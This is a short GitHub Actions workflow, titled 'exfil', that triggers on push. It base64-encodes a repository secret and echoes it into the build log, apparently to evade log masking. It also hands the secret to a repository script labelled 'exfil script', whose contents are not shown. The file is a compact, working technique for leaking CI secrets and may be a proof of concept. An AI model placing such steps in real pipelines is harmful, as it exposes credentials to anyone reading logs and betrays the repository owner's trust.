name: exfil

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v1
    - name: Run a one-line script
      env:
        SUPER_SECRET: ${{ secrets.SuperSecret }}
      run: echo $SUPER_SECRET | base64
    - name: exfil script
      env:
        SUPER_SECRET: ${{ secrets.SuperSecret }}
      run: ./.github/scripts/echo.sh
